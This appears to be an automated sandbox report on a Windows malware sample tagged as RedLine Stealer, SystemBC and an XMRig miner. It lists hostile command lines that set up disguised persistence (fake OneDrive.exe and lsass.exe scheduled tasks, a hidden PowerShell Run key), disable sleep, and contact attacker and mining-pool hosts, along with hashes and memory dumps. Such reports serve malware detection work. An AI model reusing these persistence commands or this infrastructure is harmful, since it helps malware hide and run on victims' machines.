C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp85B.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.45:80 pool.hashvault.pro tcp

Files

memory/748-54-0x0000000000830000-0x0000000000856000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1a23f09d4d0c2dcd645a4553c961260b
SHA1 86b8f8b7f46d00e520dd305367a74c9ea6faee93
SHA256 daaf04d204b6926c8f84c2142e88543abf98c064952c3064d7ac6e2251bc497c
SHA512 31b331a2ecb71575e6fcbaf05aca9dc66e8e2809a6e674f32c1317da5d8afc49b74da952ee725a2721ac749f97d1cb6c5ec207d91b25c89fd3de00986894cf92

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IFZ6WPF20CDHLBMAYA8N.temp

MD5 1a23f09d4d0c2dcd645a4553c961260b
SHA1 86b8f8b7f46d00e520dd305367a74c9ea6faee93
SHA256 daaf04d204b6926c8f84c2142e88543abf98c064952c3064d7ac6e2251bc497c
SHA512 31b331a2ecb71575e6fcbaf05aca9dc66e8e2809a6e674f32c1317da5d8afc49b74da952ee725a2721ac749f97d1cb6c5ec207d91b25c89fd3de00986894cf92

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1a23f09d4d0c2dcd645a4553c961260b
SHA1 86b8f8b7f46d00e520dd305367a74c9ea6faee93
SHA256 daaf04d204b6926c8f84c2142e88543abf98c064952c3064d7ac6e2251bc497c
SHA512 31b331a2ecb71575e6fcbaf05aca9dc66e8e2809a6e674f32c1317da5d8afc49b74da952ee725a2721ac749f97d1cb6c5ec207d91b25c89fd3de00986894cf92

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1a23f09d4d0c2dcd645a4553c961260b
SHA1 86b8f8b7f46d00e520dd305367a74c9ea6faee93
SHA256 daaf04d204b6926c8f84c2142e88543abf98c064952c3064d7ac6e2251bc497c
SHA512 31b331a2ecb71575e6fcbaf05aca9dc66e8e2809a6e674f32c1317da5d8afc49b74da952ee725a2721ac749f97d1cb6c5ec207d91b25c89fd3de00986894cf92

memory/1636-74-0x000000001B150000-0x000000001B432000-memory.dmp

memory/1952-75-0x0000000002320000-0x0000000002328000-memory.dmp

memory/928-77-0x00000000028DB000-0x0000000002912000-memory.dmp

memory/928-76-0x00000000028D4000-0x00000000028D7000-memory.dmp

memory/1684-78-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1684-79-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1636-80-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1952-81-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1952-82-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1684-83-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1636-84-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1636-85-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1952-86-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1684-87-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1684-88-0x00000000025B0000-0x00000000025BE000-memory.dmp

memory/1952-89-0x000000001B650000-0x000000001B660000-memory.dmp

memory/1636-91-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1636-92-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1952-93-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1952-94-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1952-95-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1636-96-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1636-97-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1952-98-0x0000000002740000-0x00000000027C0000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1a23f09d4d0c2dcd645a4553c961260b
SHA1 86b8f8b7f46d00e520dd305367a74c9ea6faee93
SHA256 daaf04d204b6926c8f84c2142e88543abf98c064952c3064d7ac6e2251bc497c
SHA512 31b331a2ecb71575e6fcbaf05aca9dc66e8e2809a6e674f32c1317da5d8afc49b74da952ee725a2721ac749f97d1cb6c5ec207d91b25c89fd3de00986894cf92

memory/1340-112-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/1340-114-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/1340-113-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/1340-115-0x0000000002440000-0x00000000024C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1720-124-0x000000013F0A0000-0x000000013FA6A000-memory.dmp

memory/1612-125-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1444-133-0x00000000008D0000-0x0000000000CF0000-memory.dmp

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1444-135-0x00000000008D0000-0x0000000000CF0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1a23f09d4d0c2dcd645a4553c961260b
SHA1 86b8f8b7f46d00e520dd305367a74c9ea6faee93
SHA256 daaf04d204b6926c8f84c2142e88543abf98c064952c3064d7ac6e2251bc497c
SHA512 31b331a2ecb71575e6fcbaf05aca9dc66e8e2809a6e674f32c1317da5d8afc49b74da952ee725a2721ac749f97d1cb6c5ec207d91b25c89fd3de00986894cf92

memory/1476-142-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1476-141-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1476-143-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1476-144-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1444-145-0x0000000005A40000-0x0000000005A80000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/2040-151-0x00000000000F0000-0x0000000000110000-memory.dmp

memory/2004-150-0x000000013F0C0000-0x000000013FA8A000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Temp\tmp85B.tmp.bat

MD5 726fb8450ea42fac9ac918ff46d85487
SHA1 47556b2f7d7f17896f329f3ab759c7a1602e980e
SHA256 566889a897e2647864e4b0e0b63665cd98bbf5253cf6821fa516f71b098e28eb
SHA512 c606085baddb37a2342bff6c60d95cf2bf982102f6368b4a0f423debeb4c96172922c0fefb7072e71c2ddfc298971a9b7f17f9a0818e8c974116f5bcec237dae

memory/1112-166-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/1444-167-0x00000000008D0000-0x0000000000CF0000-memory.dmp

memory/1112-168-0x0000000000EE0000-0x0000000001300000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp85B.tmp.bat

MD5 726fb8450ea42fac9ac918ff46d85487
SHA1 47556b2f7d7f17896f329f3ab759c7a1602e980e
SHA256 566889a897e2647864e4b0e0b63665cd98bbf5253cf6821fa516f71b098e28eb
SHA512 c606085baddb37a2342bff6c60d95cf2bf982102f6368b4a0f423debeb4c96172922c0fefb7072e71c2ddfc298971a9b7f17f9a0818e8c974116f5bcec237dae

memory/1112-170-0x0000000003340000-0x0000000003380000-memory.dmp

memory/1112-171-0x0000000000EE0000-0x0000000001300000-memory.dmp

C:\Users\Admin\Desktop\ExportWait.txt

MD5 72fc9a99f9afb21c7d00d1f0d62cf395
SHA1 ec366fa381e6a18329feefb17f7ef214c5a72e32
SHA256 d6d83554d88ff5967052ccd8a1486ae6b9d21836b3f0d82f90c1d6dcc0adc6f8
SHA512 186d24a3ac233cdb8394127bb5c1b633dee420ae350555d08e3b8fb034ca29d04c7b91c080cd6f717bb61c716e1d7f71a876c39dd1d75626347b481dc49c179e

memory/2040-191-0x00000000001E0000-0x0000000000200000-memory.dmp

memory/1192-201-0x0000000140000000-0x0000000140029000-memory.dmp

memory/2040-202-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-203-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/1192-205-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1112-206-0x0000000003340000-0x0000000003380000-memory.dmp

memory/2040-207-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-208-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/1112-209-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/2040-210-0x00000000001E0000-0x0000000000200000-memory.dmp

memory/2040-213-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-214-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/2040-217-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-218-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/2040-221-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-222-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/2040-225-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-226-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/2040-229-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-231-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/2040-233-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-235-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/2040-237-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-239-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/2040-241-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1112-243-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/2040-245-0x0000000140000000-0x00000001407EF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-07 01:16

Reported

2023-05-07 05:50

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

169s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
